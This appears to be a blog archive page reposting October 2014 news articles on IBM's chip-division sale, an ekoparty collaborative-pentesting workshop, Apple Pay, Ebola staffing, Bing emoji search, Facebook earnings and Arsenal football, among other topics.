الثلاثاء، 28 أكتوبر 2014

IBM Paying $1.5 Billion to Shed Its Chip Division

IBM will pay $1.5 billion to Globalfoundries in order to shed its costly chip division.

IBM will make payments to the chipmaker over three years, but it took a $4.7 billion charge for the third quarter when it reported earnings Monday.


The company fell short of Wall Street profit expectations and revenue slid 4 percent, sending shares down 8 percent before the opening bell.

Privately held Globalfoundries will get IBM's global commercial semiconductor technology business, including intellectual property and technologies related to IBM Microelectronics. It also gets IBM's semiconductor manufacturing operations and plants in East Fishkill, New York and Essex Junction, Vermont, as well as access to thousands of patents and IBM's commercial microelectronics business.

Globalfoundries said that it plans to employ substantially all IBM workers at the East Fishkill and Essex Junction plants, except for a team of semiconductor server group employees who will stay with IBM.

Under the agreement, Globalfoundries will become IBM's exclusive server processor semiconductor technology provider for 22 nanometer (nm), 14nm and 10nm semiconductors for the next 10 years.

IBM said handing over the chip division will allow it to concentrate on fundamental semiconductor research and the development of future cloud, mobile, big data analytics, and secure transaction-optimized systems.

See also: Inside IBM Watson's New NYC Digs

The deal is expected to close next year.

On Monday, IBM reported that its adjusted earnings from continuing operations were $3.68 per share, while revenue totaled $22.4 billion. The performance missed the expectations of analysts polled by FactSet, who predicted earnings of $4.32 per share on revenue of $23.39 billion.

Shares of International Business Machines Corp., based in Armonk, fell $14.33 to $167.72 in premarket trading Monday.

Source  Mashable

ekoparty 2014 - Auditing thousands of assets at a time without panicking 101



This Wed from 4pm to 6pm in the Salon Cielo, we will conduct a workshop "Auditing thousands of assets at a time without panicking 101."

This workshop will try to introduce to each attendee how to conduct a pentest in a collaborative environment. This workshop is going to try to explain how best to manage  different critical phases of a pentest. Additionally, it will deal with the different problems that can sometimes arise and the different techniques used by collaborative pentesters to increase efficiency and stay organized.

It will let the pentesters try a pentest together with the organizers of the workshops in an ideal practice environment. We will use different tools to do an interactive exercise and talk a little bit about theory as well.The most important part of course, will be the practical part where we will try to simulate problems that happen in real life. Our new product Faraday will be used to help confront these problems.

The idea is to do a practice run so we can recreate the problems that happen to pentesters in as realistic a setting as possible.
















Speakers:

Daniel Foguelman:
Masters in Computer Science and university teacher, Daniel has specialized in IT security for many years. He has worked as a pentester for many in Infobyte LLC  and has been a developer for diverse technologies and archuitectures. He is a Core Developer of Faraday.

Matías A. Ré Medina:
With more than 5 years of experience as a Security Researcher with  Infobyte LLC, focusing on web application and client side attacks.
Currently he is developing Faraday y core developer of Evilgrade..
Speaker at the 2013, giving the talk ¨All your sex tapes belong to us¨

Germán Riera:
IT Systems engineer who is currently  a core developer of Faraday. He´s done penetration testing, binary exploitation and has studied cryptography.

ekoparty 2014 - Auditing thousands of assets at a time without panicking 101

El proximo Miércoles 16hs a 18hs en el Salon Cielo dictamos el workshop "Auditing thousands of assets at a time without panicking 101."

Este workshop pretende introducir a cada asistente a realizar pentests en ambientes colaborativos. Se van a tener en cuenta las fases del pentesting más cruciales, advertencias del trabajo colaborativo y aplicación de técnicas de organización en entornos cooperativos para aumentar la eficiencia y el orden.
Se le permitirá a los participantes realizar un pentest junto con los organizadores del workshop en un ambiente preparado específicamente para resaltar la parte colaborativa del mismo, utilizando distintas herramientas, logrando así un ejercicio más didáctico y fijar lo que se vaya hablando de forma teórica.
La idea principal de la parte práctica es intentar recrear un pentest donde ocurran problemas similares a los que ocurrirían en la realidad en ambientes colaborativos. Este workshop pretende introducir a cada asistente a la realización de pentests en ambientes colaborativos. Se van a tener en cuenta las fases del pentesting más cruciales, posibles complicaciones del trabajo en grupo y la aplicación de técnicas de organización en entornos cooperativos para aumentar la eficiencia y el orden.

Se le permitirá a los participantes realizar un pentest junto con los organizadores del workshop en un ambiente preparado específicamente para resaltar la parte colaborativa del mismo, utilizando Faraday, un entorno de pentest colaborativo. Logrando así fijar los conceptos teóricos.

La idea principal de la parte práctica es intentar recrear un pentest donde ocurran problemas similares a los que ocurrirían en la realidad.









Speakers:

Daniel Foguelman:
Master en Computer Science y docente universitario, Daniel se especializo en Seguridad Informática desde sus primeros años.
Se ha desempeñado en su historia como pentester en Infobyte LLC (entre otras), como desarrollador en diversas tecnologías y arquitecturas, como docente universitario y Core Developer en Faraday.

Matías A. Ré Medina:
Con 5 años de experiencia como Security Researcher en Infobyte LLC, aplicando técnicas de penetration testing enfocado en ataques client side y aplicaciones web.
Actualmente desarrollador de Faraday y core developer de Evilgrade.
Estudiante de Ingeniería de Sistemas, en su ultimo año.
Orador en la conferencia Ekoparty 2013: "All you sextapes belong to us".
Investigaciones: "Brainfuck beware: JavaScript is after you!", "Bypassing WAFs with non­alphanumeric XSS", "Pornographic Image Jacking Algorithm".

Germán Riera:
Ingeniero en Sistemas de la información, actualmente se desempeña como Core Developer en Faraday.
Ha realizado penetration testing, explotación de binarios y ha estudiado criptografía por varios años y continuara haciendolo...

Nurse caught on Skype stealing money from new parents

A nurse at a Melbourne hospital has been caught red-handed on Skype stealing from a new dad.

The victim was talking to his father in Greece over the video chat program just days after the birth of his premature son, when he left the computer to help his new baby in the bath.


Skype remained connected and the father witnessed a nurse go through his son's belongings at the Epworth Hospital maternity ward and take something out.

New mum, Chrysa, said her father-in-law alerted them upon returning to the room to check his son's wallet as the nurse took out a $20 note. He then identified the culprit when she re-entered the ward.

"He saw a woman come into the room and she tried to open the wardrobe and was looking (around)," Chrysa told Fairfax. "Then she went to the chair — my husband's jacket was there — and she took the wallet and opened it."

A hospital spokesperson told 3AW Radio they were shocked at the brazenness of the theft and the nurse, aged in her 50s, has been dismissed from her job.

The new parents, who stayed in the hospital a month after with their premature baby, left the nurse's punishment in the hospital's hands but did not request for her to lose her job. She apologised immediately and returned the money to the couple.

"It was only $20 but it's not right from a nurse," Chrysa said. "We didn't want her to lose her job but we should report [it] because it was a private hospital and other parents could have the same situation as us if we didn't."

Source Mashable

Tim Cook talks Apple Pay pushback, Alibaba deal, death of iPod Classic

Apple CEO Tim Cook in Montgomery, Alabama on October 27, 2014. Cook spoke at the Wall Street Journal tech conference Monday night.
LAGUNA BEACH — Apple CEO Tim Cook gave an unusually candid interview Monday night — in which he struck back at companies leaving the Apple Pay system, teased a possible partnership with Alibaba, and revealed why Apple killed the iPod Classic.

Speaking at the WSJ.D conference in Laguna Beach, California, Cook called Apple Pay a tremendous success even in its first week, and revealed that there had been 1 million credit cards activated on the system in its first 72 hours. "That's more than all the other guys combined," Cook enthused, touting his early lead over similar payment systems such as Google Wallet. "And we're only just getting started. I'm already getting flooded with emails from customers."

As for the fact that CVS and Rite Aid just blocked Apple Pay? Cook dismissed that as business maneuvering. "It's a skirmish," he said. "Over the long arc of time, retailers will step back and say, no other system is more secure." He added pointedly: "you're only relevant as a retailer if your customers love you." (CVS and Rite Aid are working on their own system, to be launched in 2015 and called Current C.)

"We’re not collecting your data," Cook added. "We’re not Big Brother. There's no other mobile payment system where you can say it’s easier than the credit card." Indeed, Cook had to change his own credit cards twice last year because of various security issues, he revealed. "It's a pain in the butt. You forget to change [the card] on one or two on websites, people don’t think you pay your bills any more."

That "long arc of time" was something Cook frequently invoked — such as when discussing iPhone sales, which he suggested would constitute roughly 50% of the business for the foreseeable future. Also happening in the long arc of time is a possible relationship between Apple Pay and Alibaba's AliPay, a popular payment system in China.

"We're going to talk about getting married later this week," Cook said of Alibaba CEO Jack Ma, who'd said much the same thing during his preceding talk. "We love to partner with people who are wicked smart."

See also: Blocking Apple Pay Is a Stupid Move for Retailers

On the Apple Watch, Cook clarified a question that had been bothering some — when he said at its launch that you'd have to charge it every day, did he mean during the day or once at night? "People going to charge it overnight, we think," Cook said, although he pointed out there wasn't a lot of data to go on yet. "There’s a scenario where you use it less and charge less frequently, certainly."

When an audience member complained that he was about to buy a 160 GB iPod Classic when Apple discontinued the device a few months ago, Cook shrugged: "We couldn’t get the parts any more, not anywhere on Earth," he insisted. "It wasn’t a matter of me swinging the ax, saying 'what can I kill today'.

"The engineering work was massive, and the number of people who wanted it very small. I felt there were reasonable alternatives.

Source Mashable

Photographer documents the death of real-life conversation

As our smartphones make it easier to connect with people across the globe, they often can make it harder to connect face-to-face.

London-based photographer Babycakes Romero doesn't own a smartphone. Instead, he treks along in his beloved city, camera in hand, capturing whatever catches his eye. "As a person dedicated to observation, I just feel I would be missing too much of the world around me if I was staring into the palm of my hand the whole time," he says.

See also: The Hard Truth About Your Online Life

In his photo series, Death of a Conversation, Romero captures people connection with their digital devices rather than with each other — a phenomenon he believes is only creating more pain and social awkwardness to the world. "I saw that smartphones were becoming a barrier to communication in person. I saw how people used it as a social prop, to hide their awkwardness, to fill the silence ... they basically allow people to withdraw rather than engage."

People walking around parks, in shopping centers, at restaurants and at social events all have one thing in common: no matter how public or social their setting might be, Romero caught them at a time when they were using their smartphone rather than interacting with each other.

As Romero says, "they do not even seem present in the real world. They are 'plugged in' to a virtual world of their own making."

On the other hand, it is very possible that people could be receiving an urgent message or checking a map on their phone in that one snippet of time in which their photo was taken. Romero says he is not entirely averse to technology, however, thinks "people are starting to derive more pleasure from their 'computer cuddles' than from their person to person interactions."

In the end, Romero hopes to educate people who see his photos and hope to raise a discussion about social smartphone etiquette. "Maybe [people] would at least consider how they used their smartphones and question whether it is appropriate to do it at the expense of those around them and also themselves," he says.

Romero also runs a daily photo series called #MyLDN. His other work can be seen on his website and on Twitter.









A single mutated gene can turn sweating completely off

People with a rare disorder called anhidrosis cannot produce sweat, and now a new study finds that the condition may be caused by a mutation in a single gene.

Researchers studied a Pakistani family with several children who could not sweat. The condition can be dangerous because an inability to sweat puts a person at higher risk for heatstroke when temperatures are high.

Anhidrosis can have several causes; for example, it can result from damage to sweat glands caused by trauma or developmental conditions. But the five children in the study, whose parents were relatives, had sweat glands that appeared normal.

SEE ALSO: 16 Oddest Medical Case Reports

The researchers' analysis of the family members' genomes revealed that a genetic mutation may have caused the condition in this family. The mutation was in a gene, called ITPR2, that controls a basic cellular process in sweat glands, according to the researchers, led by Katsuhiko Mikoshiba, a molecular cell biologist at the RIKEN Brain Science Institute in Japan, and Niklas Dahl, a genetics researcher at Uppsala University in Sweden.

The gene encodes a protein, called InsP3R, that helps calcium ions move into and out of cells, which is essential for many cell functions. The mutation the scientists discovered results in faulty proteins that don't allow cells to release calcium ions.

"The surprise was that a point mutation, not a large deletion, was enough to cause the human disorder," Mikoshiba said in a statement. Point mutations are a change in a single "letter" (such as an A, T, G or C) of a person's genetic code, whereas deletion mutations can involve a larger amount of genetic material being lost.

The researchers also found that mice that lacked the ITPR2 gene sweated markedly less in their paws than their counterparts that had the normal gene, according to the study, which was published Oct. 20 in The Journal of Clinical Investigation.

See also: Coffee Lover? Blame Your Genes

Calcium ions are involved in cellular processes ranging from organ development to heart function to saliva production. But the five affected family members in the study do not have any symptoms that might be expected, other than not being able to sweat, the researchers found. For example, they didn't report having dry mouth, the researchers said.

This may mean that the faulty InsP3R protein may have different functions in sweat glands than in salivary glands or other organs, or that other types of this protein may compensate for the faulty one in other organs, the researchers said.

The finding that this protein is involved in anhidrosis could help researchers develop treatments for the opposite problem — excessive sweating, the researchers said.

"Although anhidrosis is quite a rare condition, the 'opposite' phenotype — excess sweating, or hyperhidrosis — is a common problem, affecting 2% of the population" Dahl said. The new findings suggest that a drug that blocks InsP3R could reduce sweat production, the researchers said.

SOURce Mashable

5,000 Ebola health care workers needed in West Africa

A medical worker sprays people being discharged from the Island Clinic Ebola treatment center in Monrovia, Liberia.
More than 5,000 additional health care workers are needed to fight Ebola in the three most affected countries in West Africa, the president of the World Bank said Tuesday.

Jim Yong Kim said he is worried about where those health care workers can be found given the Ebola fear factor. The World Bank president spoke in Ethiopia alongside U.N. Secretary-General Ban Ki-moon and African Union chairwoman Nkosazana Dlamini-Zuma.

Ban said the transmission of the virus continues to outpace the international community's response. He appealed for African Union member states not to impose Ebola-related travel restrictions or close their borders.

"We need to have a steady stream of health care workers from Africa coming into the three affected countries. The head of the U.N. Mission for Ebola Emergency Response, David Nabarro, has told us that we need at least 5,000 health workers from outside the region," Jim said.

"

    Right now, I'm very much worried about where we will find those health care workers.

Right now, I'm very much worried about where we will find those health care workers. With the fear factor going out of control in so many places, I hope health care professionals will understand that when they took their oath to become a health care worker it was precisely for moments like this," he said.

Dlamini-Zuma said African Union states have pledged to send more than 2,000 health care workers into West Africa. She did not say when the workers would arrive.

"The disease, which is not new to the world, and its manifestations in these countries, has caught us by surprise. With the wisdom of hindsight, our responses at all levels — continental, global and national — were slow, and often knee-jerk reactions that did not always help the situation," Dlamini-Zuma said.

Ebola has hit the West African countries of Liberia, Sierra Leone and Guinea the hardest. The outbreak has killed nearly 5,000 people.

SOURCE Mashable

Microsoft's Bing adds a new feature, its supporting emoji (emoticons and other special )

Microsoft's search engine Bing announced support for emoji, enabling users to type in the special characters into mobile or desktop search and receive results based on their meaning.

Bing says the feature, which will be available in English markets, is a way for users to "search the same way you communicate every day."

The search engine will offer up definitions for some of the more puzzling emoji. It can even combine different emoji, or words and emoji to provide search results.

Vanity Fair spoke with Craig Beilinson, Microsoft’s director of marketing communications, who explained why the company wanted Bing to offer support for the ubiquitous emoticons.

“Just like I would text my friends if they wanted to go out for sushi, now I can search Bing using the emoji on my phone instead of typing ‘sushi’ and still find a great place to eat,” he said.

Whether it’s actually any faster than just typing the words “sushi restaurants nearby” depends on how well you know your emoji keyboard, usually available on mobile.

emoji search


To try it out on your desktop computer, make sure you're using the right browser. Chrome, for example, doesn't recognize emoji, but Apple's Safari does. We've used Safari to perform the search seen in the image above.

Bing's biggest competitor, Google, currently does not offer emoji search.

Source Mashable

What to expect from Facebook Q3 earnings Here is a preview

Facebook CEO Mark Zuckerberg delivers a speech during a workshop for application developers in Jakarta, Indonesia, Monday, Oct. 13, 2014.
It has been a tough earnings season for tech companies so far, with Twitter, Netflix and Amazon all getting hammered after reporting their quarterly results this month. Will Facebook fare any better?

Facebook will report its third quarter results after the market closes on Tuesday. It is expected to post earnings of $0.40 per share on revenue of $3.12 billion, according to analysts surveyed by Thomson Reuters. By comparison, Facebook reported earnings of $0.25 per share on revenue of just more than $2 billion in the same quarter a year earlier.


The social media company has beat analyst estimates in each quarter this year, but as CNBC points out, Wall Street's expectations may be a bit high considering Facebook's own warning that the growth rate could slow in the second half of this year.

    After having struggled in its first months as a public company, Facebook has turned into a Wall Street darling

After having struggled in its first months as a public company, Facebook has turned into a Wall Street darling thanks to in large part to its ability to monetize on mobile. Mobile ads accounted for 62% of the company's total ad revenue in the second quarter, up from effectively nothing in the lead-up to its IPO in 2012. Arvind Bhatia, an analyst with Sterne Agee, predicts that mobile ads will account for 66% of ad revenue in the September quarter and may hit 80% in the next two years.

"There is seemingly little that can get in the way of Facebook given its hegemonic status in the world of online advertising, matched only by Google," Brian Wieser, an analyst with Pivotal Research Group, wrote in an investor note last week.

Investors and analysts are generally optimistic about Facebook's ability to monetize through video ads, Instagram ads and the recently launched "Buy" button on its website, though the company's execs will likely stress that these efforts are still very early on.

Some of Facebook's recent acquisitions may be in the spotlight during the earnings call that follows the release on Tuesday. Facebook finally closed the WhatsApp deal earlier this month, after having announced it back in February. It also launched a new ad platform in September based on Atlas, a company it acquired from Microsoft last year.

Facebook stock topped $80 a share for the first time last week and was trading near its all-time high Tuesday morning ahead of its earnings announcement. The company now has a market cap of just under $210 billion.









Source Mashable

الاثنين، 27 أكتوبر 2014

Wenger Eager to See Theo Walcott Join Their Already Speedy Attack

I feel the need... the need for speed: Wenger could unleash Walcott on Burnley next weekend
Arsene Wenger has not lost his imagination even after hitting his 65th birthday, and passing 18 years in charge of Arsenal.

Some might argue that the latter part of his reign has been propped up with too much fantasising about the potential of his side.

Believing they are one player from really clicking.

Imagining how close they are to being the perfect footballing team.

And after a dominant performance saw off ­Sunderland - the Londoners' first win in four league games - Wenger was pondering the imminent return of Theo Walcott from his January knee injury.

Would pairing the lightning-quick England man with Alexis Sanchez, and Alex Oxlade-Chamberlain give him a ­frightening attack? Could he lift them from fifth place, to even loftier peaks?

“Yes, my imagination works like yours,” Wenger said. “But I have to prove it works on the pitch and that is what I will try to do when everybody is back.”

With the droll tone of a sage, Wenger added: “Let’s see. The imagination does not always become reality in our job, so we are a bit cautious.”

Will Arsenal finish 4th again this season?

    Yes
    No. Higher
    No. Lower



Arsenal supporters will know exactly what he means.

This was a nondescript victory, impossible to judge what it meant for the Gunners.

They had loads of possession, used it well and toyed with confidence-shorn Sunderland, who were still shaking off the torment of last weekend's 8-0 defeat at Southampton.

Arsenal should have scored more, and needed two terrible errors from Wes Brown and Vito Mannone to gift Sanchez their goals.

And so to Walcott’s return.

He was on the bench here for the first time since his injury, but his only action was limited to the warm-up and a post-match running session.

Gareth Copley SUNDERLAND, ENGLAND - OCTOBER 25: Theo Walcott of Arsenal is greeted by Deleilah the Sunderland mascot prior to kickoff during the Barclays Premier League match between Sunderland and Arsenal at the Stadium of Light on October 25, 2014 in Sunderland, England. (Photo by Gareth Copley/Getty Images)
Don't have kittens: Struggling Sunderland were spared having to deal with Walcott's pace too


Wenger said: “I am very happy he is with us, but he has had 10 months out. I have to find a way of bringing him back slowly over the next three or four weeks.

“Theo’s runs off the ball are always fantastic and he gives you hope that we will score goals. And the pace we have in the side when he comes back will be very interesting - Walcott is quick, Chamberlain is quick, so we can be very good in transition.”

Struggling Burnley at home next Saturday would appear to be a decent comeback game for Walcott.

Bedraggled Sunderland are in for another long relegation fight.

Blighted again this season by individual errors, their squad also lacks the class of other Premier League sides.

Manager Gus Poyet is unsure whether the Wearside club are any better off now than they were in the dark days of a year ago.

He said: “That is a great point and I agree with you. From last year, the team that started against Arsenal here, seven players are not at the club any more. Seven. Do you want to know which ones? Westwood, Celustka, Roberge, Diakite, Jack Colback, Ki, Borini – they are not here. Eight of the starting 11 of Arsenal are in their squad.

Sunderland 0-2 Arsenal in pictures:

Alexis Sanchez of Arsenal celebrates with teammates after scoring the opening goal VIEW GALLERY


"We have had to start all the way from zero again. How can you have a consistency, of ­understanding the game and a mentality of passing, if you are starting afresh every year? You are always catching up.

“Three weeks ago, we were complaining about no wins in the league. We won that game – which was apparently the most important thing for the season – and then the next two matches were the worst of the season.”

So have you improved, Gus?

“I thought until last week we were a difficult team to play against. But you can’t get away from the mistakes. We have conceded too many own goals, we are still conceding too many own goals and we are still making too many individual mistakes.

“So, no, that part of the game hasn’t improved at all. It is still there, it is inside the club, the group or whatever you call it and that is something I haven’t improved. My mistake, I accept responsibility. So it is up to you to judge."

Well, the judgement so far, can only be that Sunderland will continue to struggle.
Source Mirror

Paul Clement Rumoured as Eventual Arsene Wenger Replacement at Arsenal



Whether Arsene Wenger's Arsenal reign is set to come to an end any time soon remains to be seen, but current Real Madrid assistant coach Paul Clement is being rumoured as the Frenchman's potential successor.

AS is reporting (h/t Sport's Samuel Marsden) that Wenger is set to leave Arsenal at the end of the season, with Englishman Clement already lined up to take over for the 65-year-old at the Emirates:

The Gunners have not had the best start to the season in the Premier League but currently sit fifth in the division after Saturday's 2-0 victory over Sunderland.

Denis Doyle/Getty Images

While Wenger has been hugely successful at Arsenal, their FA Cup win last season was the north London club's first piece of silverware since 2005, and there have oftentimes been calls for the Frenchman to take his leave, per Stan Collymore of Bleacher Report UK:

However, though it has been some time since Arsenal genuinely competed for the English title and 10 years since they actually won it, it is unlikely Wenger will ever be forcibly removed from the Gunners' top job.

He is rightly regarded as one of the great managers of the modern era and is largely responsible for making Arsenal one of Europe's top clubs.

On the recent occasion of his 65th birthday, Wenger expressed his continued motivation to do well in his job as Gunners boss, per John Cross of the Daily Mirror: "I honestly feel more motivated - more than ever. Do I feel young? No, my age is my age. You have to live with that. Until now I am lucky to be in shape. But the desire and motivation is stronger than ever. I am so keen to do well with my team this season. Hopefully we can do it. I feel there is huge potential there."

These recent comments would seem to suggest he is still eager to stay in charge at Arsenal, and it is likely that he would wish to go out on a high—as Sir Alex Ferguson did at Manchester United—when he does decide to call it a day.

Is it time for Wenger to call it a day at Arsenal?
Yes No Submit Vote vote to see results

Clement would arguably be a bold choice as Wenger's replacement, with the 42-year-old having never previously held the top managerial job at any club.

However, he has worked with the likes of Guus Hiddink and Carlo Ancelotti and across Europe with Blackburn, Chelsea, Paris Saint-Germain and now Real Madrid.

Clement would certainly be an interesting choice of successor but would face the huge pressure—like David Moyes at Old Trafford—of working in the shadow of a managerial great.

However, first of all, Wenger has to call it a day, and despite the AS report, that may not happen for some time yet.

Arsenal Must Emulate Real Madrid's Counter-Attacking Style This Season



Arsenal's formula for success this season is clear. The Gunners must emulate Real Madrid's counter-attacking style.

Just like like Los Blancos, Arsenal have the pace and movement in attack to to terrorise defences on the break. But manager Arsene Wenger's team will have to play in a quicker, more direct manner to make the most of their attacking talents.

Chief among those talents is electric roving forward Alexis Sanchez. The Chilean is fast becoming a steal at around £35 million.

The ex-FC Barcelona attacker has already netted eight goals in 15 appearances in all competitions this season, per Arsenal.com. He's also provided three assists in Premier League and UEFA Champions League action, according to WhoScored.com.

Clive Rose/Getty Images





Sanchez is the key to a new-look Arsenal.

Sanchez's form is earning praise from all quarters, including ex-Manchester United striker, and now Sky Sports pundit, Dwight Yorke, who told Match Choice:

    Arsenal and everyone who has watched world football saw what he was doing at Barcelona before he joined the club.

    He had a terrific World Cup and he's come to Arsenal with a lot of expectation, a lot of money has been paid for him and he's delivering.

    He's delivering week in week out. He's really risen [to] the occasion and he's come in to a new environment and he’s quickly adapted to being an Arsenal player.

Sanchez offers the field-stretching pace every defender fears. He's also a finisher of the highest order, exuding confidence and class every time he bears down on goal.

But it's the pace that sets him apart. It's also a quality he shares with many other members of Arsenal's forward-line rotation.

In particular, Sanchez can match winger Theo Walcott lightning-fast stride for lightning-fast stride. That pairing, so far denied an outing by Walcott's familiar injury woes, can give Arsenal width, movement and enough speed to expose any opposition.

Lefteris Pitarakis/Associated Press
Wenger must build his team around the pace of Walcott and Sanchez.

Wenger is already relishing the prospect of putting that theory into practice, per Arsenal.com reporter Max Jones:

    His runs off the ball are fantastic and it always gives you hope that you can score goals. The pace we have in the side when he’s back is very impressive because Welbeck, Alexis and Oxlade-Chamberlain are also very quick.

    Could the attacking pace frighten defences? Let’s see. My imagination works like yours but I have to prove that they can work together on the pitch and that’s what I’ll try to do when everybody’s back.

That the Frenchman also made reference to the speed and skills of winger Alex Oxlade-Chamberlain and striker Danny Welbeck is very encouraging. They certainly have the pace to frighten defenders out of their wits.

In fact, you can add Joel Campbell and Serge Gnabry to the list of fleet-footed attackers the Gunners can unleash this season. Even Lukas Podolski, he of the expert finishing but work-shy tendencies, operates best as a counter-attacking threat.

Wenger has all the weapons he needs to make Arsenal quicker and more efficient going forward this season. As he noted, the next step is making it work.

The first part of that process should involve Wenger casting a close eye over how Madrid do things. Obviously, Los Merengues manager Carlo Ancelotti has the luxury of Cristiano Ronaldo, Gareth Bale and Karim Benzema in attack.

    Share
    Tweet
    Email

Arsenal certainly aren't quite on a par with those resources. However, it would be churlish to deny the awesome potential of a forward line comprised of Walcott, Welbeck and Sanchez.

But it's the way Ancelotti's team plays to support its star-studded attacking trio that should appeal to Wenger. Ancelotti has designed his team's style solely on the ability to launch breaks whenever they steal possession.

The key to that has been to reject the idea of a brutish, holding midfielder in front of the back four. Instead, Ancelotti trusts lightweight pass-masters Luka Modric and and Toni Kroos to forage for the ball and quickly and accurately find the players who will make a difference in the attacking third.

Both Kroos and Modric often stay deep, with the latter the most withdrawn. Because they lack the sacred "steel" in the middle, Los Blancos invite teams onto them.

They absorb possession and pressure rather than seeking to destroy it. Once an opposition move breaks down, Madrid strike, most often via a quick pass out wide to set three- and four-man relay teams on their way.

Alex Livesey/Getty Images
Ancelotti has found the perfect counter-attacking formula with Real Madrid.

Ancelotti's team has no need for a ball-winning destroyer. They didn't need one to beat Liverpool 3-0 at Anfield in the UEFA Champions League, usually a hostile environment demanding players get stuck in.

Madrid also didn't need a holding player to thrash Barca 3-1 in the recent Clasico. Even against quick-witted playmakers Xavi Hernandez, Andres Iniesta and Ivan Rakitic, Ancelotti didn't focus on breaking up play. Instead, he knows it suits his own team's attack best to react to it.

But replacing defensive midfielders with deep-lying playmakers isn't the only smart ploy Ancelotti uses. He also trusts a pacy schemer in advanced areas to supply his runners with through passes.

Last season that player was Angel Di Maria. This year it's Colombian sensation James Rodriguez.

Can Arsenal successfully replicate Real Madrid's style of play?
Yes No Submit Vote vote to see results

This floating No. 10 player simply drifts and hovers in the grey areas behind the forward line. He often breaks with Ronaldo, Benzema and Bale, always ready to provide the decisive assist.

Di Maria thrived in this role during the last campaign. He tallied 22 assists in La Liga and Champions League competition, per WhoScored.com. The same site already credits Rodriguez with five assists this season.

So how can all of this work for Arsenal? The answer should be simple, injuries permitting. That's because Wenger already has players in place to replicate this formula.

For his deep-lying pairing, Aaron Ramsey and Mikel Arteta represent the best partnership. Both are more adept on the ball than Mathieu Flamini, as well as quicker at exchanging passes than Jack Wilshere.

Jamie McDonald/Getty Images
Arteta and Ramsey's partnership can be the key to a game designed to flourish on the break.

Further forward, Mesut Ozil is made for the the type of role that helped Di Maria and Rodriguez thrive. His speed of thought and ability to split defensive gaps are lethal qualities whenever he has pacy runners ahead of him.

With a deep-lying, two-man barrier behind him, Ozil needn't worry too much about tracking back. After all, Arsenal's game should be about inviting teams on, rather than committing heavy numbers in forward areas.

Wenger wouldn't need to rely on such a gung-ho approach with Sanchez, Walcott, Welbeck and Ozil as his front four. That's a quartet capable of occupying any defence.

Even with reduced numbers in forward areas, Arsenal can still produce the quick combinations in attack Wenger loves. But those combinations won't be worked slowly through midfield. Instead, they'll be executed at pace in the attacking third.

Take Ronaldo's first goal at Anfield as a prime example of the kind of slick and creative passing football Madrid produce without dominating possession:

    Share
    Tweet
    Email

It's not as if this formula is anything new to Wenger. His best Arsenal teams were deadly on the break, often producing their best moves once they countered.

Consider the 2-2 away draw against Tottenham Hotpsur that clinched the league title for The Invincibles in the 2003/04 campaign. The first goal was sheer counter-attacking brilliance, borne from pace and intricacy.

It was a three-touch exchange between Thierry Henry, Dennis Bergkamp and Patrick Vieira. The move had started when the Gunners repelled a Tottenham corner.

In fact, you could consult any number of goals from that glorious season and witness Arsenal breaking at speed with quickness and invention to score in four passes or less.

Shaun Botterill/Getty Images
Wenger's 'Invincibles' were masters of the counter-attacking game.

Last week, I described how abandoning what worked in the past has cost Wenger and Arsenal in recent seasons. Now is the ideal time to revive the old, successful formula.

One great reason is how much the game has changed since Arsenal clinched the Premier League crown at White Hart Lane just over a decade ago. For instance, the Gunners don't even need a physical mauler like Vieira or a defence-first linchpin like Gilberto Silva to rediscover their counter-attacking chops.

Modric and Kroos prove that. But Arsenal also needn't fear another team's so-called "physical presence."

The idea of a player tasked with just breaking up play in front of a back four is fast becoming an archaic one. A great example was how Sergio Busquets, Barcelona's long-time defensive shield, was rendered useless in the Clasico. Busquets was a virtual non-entity because of the way Los Blancos simply bypassed him at pace.

Consider also how easily Germany broke at speed past midfield destroyers Luiz Gustavo and Fernandinho in their 7-1 annihilation of Brazil at the 2014 FIFA World Cup:

    Share
    Tweet
    Email

Arsenal can do the same. They can easily bypass a holding player down the flanks or simply play around him at speed. Since they don't have a rugged ball-winner of their own, the Gunners shouldn't play with that position.

This speaks to how Wenger can put a new style into a tactical structure that works. He could opt for the fluid 4-3-3 that Ancelotti has chosen to make his Madrid kings of Europe.

Alternatively, Wenger could really go back to basics and indulge his fondness for versions of the 4-4-2. He offered a hint of this in the recent 2-0 away win over Sunderland.

Both goals came courtesy of Sanchez after defensive mistakes he helped force. The performance itself was a commendable example of playing cagey to absorb pressure and strike on the break.

Had Arsenal been more clinical on the counter, they would have left Sunderland with a more comprehensive victory. Afterwards, Arteta explained how Sanchez was given more freedom thanks to a subtle structural shift, per Arsenal.com reporter Rob Kelly:

    I felt really comfortable with [Flamini]. Last year we played some important games together and I think we understand each other well.

    We wanted to give a bit more freedom to Alexis, playing a bit behind Danny [Welbeck], more like a 4-4-2, which we haven't played for a while. It worked - I think Alexis did very well today so we're happy for him.

A return to a lopsided 4-4-2 would be excellent for this Arsenal squad. Sanchez could play behind Welbeck, while Walcott replaces the still-too-raw Chamberlain on the wing.

Michael Regan/Getty Images
A change in shape helped Arsenal break superbly at Sunderland and still keep a clean sheet.

Whatever the formation, Wenger's tactics needn't be rigid. Ramsey can still be allowed to push forward on occasion, a strength of his game. Kroos has similar license to support attacks for Madrid, particularly during home games at the Santiago Bernabeu.

But rather than formation concerns, this is more about a stylistic shift. Take the inconsistent performance against Sunderland as the prime example.

While it had its rough edges, this is how a team can look when it sits deeper to invite pressure, rather than rushing frantically to dominate possession.

The latter is something Arsenal do too often. The problem is the Gunners are no longer good enough to impose their passing game on the best teams.

Selling wantaway playmakers such as Cesc Fabregas and Samir Nasri has seen to that. So has a lack of dynamic athletes able to press and harry at both ends of the pitch for 90 minutes.

Arsenal's current patient-approach play wastes this team's pace, particularly through the middle.

The death-by-1,000-passes approach works best when target man Olivier Giroud is the centre-forward. His size offers an outlet for the Gunner's diminutive schemers to build toward and play off and around.

But with Welbeck's pace through the centre, the Gunners need a quicker game. That's not always possible when players like Wilshere, in particular, are too often guilty of slowing the game down.

Paul Gilham/Getty Images
The Gunners need a quicker game to suit their pace in attack.

A methodical, probing style leaves pacy runners like Welbeck, Walcott and Sanchez static, utterly wasting their threat.

This squad demands Wenger moves away from a steady, possession-based game to one based on quick exchanges and countering at speed. The Gunners need a willingness to sit deeper and invite teams onto them away from home. They also need to be a little more cagey about how they approach games at the Emirates Stadium.

Arsenal can be more structurally sound defensively the more they sit deep and keep a solid shape to spring a counter trap. Once they become more proficient on the break, the Gunners will also make more of their scoring chances.

Wenger has spent years crafting a playing style akin to the methodical pass-and-move approach favoured by Barcelona. But emulating Barca's great rival from the Spanish capital can get Arsenal back on track quicker than a Walcott-Sanchez-led counter-attack.

source Bleacher Report

All you should know about Android Lollipop

